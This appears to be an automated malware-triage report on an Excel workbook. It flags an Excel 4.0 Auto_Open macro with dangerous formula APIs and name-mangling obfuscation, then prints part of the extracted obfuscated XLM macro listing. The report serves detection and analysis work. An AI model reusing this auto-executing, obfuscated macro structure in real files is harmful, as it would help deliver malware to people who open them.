MALICIOUS
Risk Score: 142
Heuristics: 4
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6837 bytes |
SHA-256: 654f47a6b276f1a7316a793303d502c2a27cf71e6bba74571a2c3a51cf29b5a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'kcwbDeDSdxTV'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - iRxLdvxxF
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C158
' 0018 22 LABEL : Cell Value, String Constant - FNuDQNs len=0
' 0018 24 LABEL : Cell Value, String Constant - fwouYWWfR len=0
' 0018 24 LABEL : Cell Value, String Constant - GCLdZUQhD len=0
' 0018 26 LABEL : Cell Value, String Constant - GktZFDHVKhM len=0
' 0018 25 LABEL : Cell Value, String Constant - gVdjHayIBi len=0
' 0018 22 LABEL : Cell Value, String Constant - HHBliDl len=0
' 0018 24 LABEL : Cell Value, String Constant - HzFqoAQsA len=0
' 0018 27 LABEL : Cell Value, String Constant - kcwbDeDSdxTV len=0
' 0018 23 LABEL : Cell Value, String Constant - kiYsRTJn len=0
' 0018 23 LABEL : Cell Value, String Constant - ksHhDTSd len=0
' 0018 26 LABEL : Cell Value, String Constant - MwZSqPjSrco len=0
' 0018 22 LABEL : Cell Value, String Constant - NZnauZO len=0
' 0018 24 LABEL : Cell Value, String Constant - OHJBlKnYn len=0
' 0018 27 LABEL : Cell Value, String Constant - oXGORGsKHDmE len=0
' 0018 27 LABEL : Cell Value, String Constant - rNFfYepuUuiP len=0
' 0018 22 LABEL : Cell Value, String Constant - rUKtCSL len=0
' 0018 22 LABEL : Cell Value, String Constant - TunCuSN len=0
' 0018 23 LABEL : Cell Value, String Constant - vbcpVZHy len=0
' 0018 27 LABEL : Cell Value, String Constant - WYctQjcLqoZU len=0
' 0018 27 LABEL : Cell Value, String Constant - YoeYNuvpHYCd len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' iRxLdvxxF,C64,"SET.NAME("fwouYWWfR",0+VALUE("0"))",""
' iRxLdvxxF,C69,"SET.NAME("HzFqoAQsA",fwouYWWfR)",""
' iRxLdvxxF,C72,"SET.NAME("TunCuSN",fwouYWWfR)",""
' iRxLdvxxF,C76,"SET.NAME("kiYsRTJn",COUNTA(OHJBlKnYn))",""
' iRxLdvxxF,C78,"SET.NAME("oXGORGsKHDmE",COUNTA(YoeYNuvpHYCd))",""
' iRxLdvxxF,C82,[],""
' iRxLdvxxF,C86,"SET.NAME("vbcpVZHy","")",""
' iRxLdvxxF,C89,"HzFqoAQsA",""
' iRxLdvxxF,C93,"SET.NAME("NZnauZO",HLOOKUP("*",OHJBlKnYn,HzFqoAQsA,FALSE))",""
' iRxLdvxxF,R96,"",-249.00000000000000000000
' iRxLdvxxF,C97,"GCLdZUQhD",""
' iRxLdvxxF,R97,"",-242.00000000000000000000
' iRxLdvxxF,R98,"",-305.00000000000000000000
' iRxLdvxxF,R99,"",-320.00000000000000000000
' iRxLdvxxF,C100,"SET.NAME("FNuDQNs",fwouYWWfR)",""
' iRxLdvxxF,R100,"",-383.00000000000000000000
' iRxLdvxxF,R101,"",574.00000000000000000000
' iRxLdvxxF,C102,[],""
' iRxLdvxxF,C107,"FNuDQNs",""
' iRxLdvxxF,C112,"GktZFDHVKhM",""
' iRxLdvxxF,C116,"WYctQjcLqoZU",""
' iRxLdvxxF,C120,"MwZSqPjSrco",""
' iRxLdvxxF,C123,"SET.NAME("rNFfYepuUuiP",VALUE(HLOOKUP("*",YoeYNuvpHYCd,MwZSqPjSrco,FALSE)))",""
' iRxLdvxxF,C126,"rUKtCSL",""
' iRxLdvxxF,C131,"vbcpVZHy",""
' iRxLdvxxF,C134,"TunCuSN",""
' iRxLdvxxF,C136,NEXT(),""
' iRxLdvxxF,C139,"ksHhDTSd",""
' iRxLdvxxF,C144,[],""
' iRxLdvxxF,C147,"HHBliDl",""
' iRxLdvxxF,C151,NEXT(),""
' iRxLdvxxF,C154,RETURN(),""
' iRxLdvxxF,C175,"SET.NAME("gVdjHayIBi",C64)",""
' iRxLdvxxF,C177,"OHJBlKnYn",""
' iRxLdvxxF,C181,"SET.NAME("YoeYNuvpHYCd",R67C13)",""
' iRxLdvxxF,C183,"SET.NAME("HHBliDl",190)",""
' iRxLdvxxF,C186,"SET.NAME("kcwbDeDSdxTV",3)",""
' iRxLdvxxF,C189,gVdjHayIBi(),""
' iRxLdvxxF,C190,HALT(),""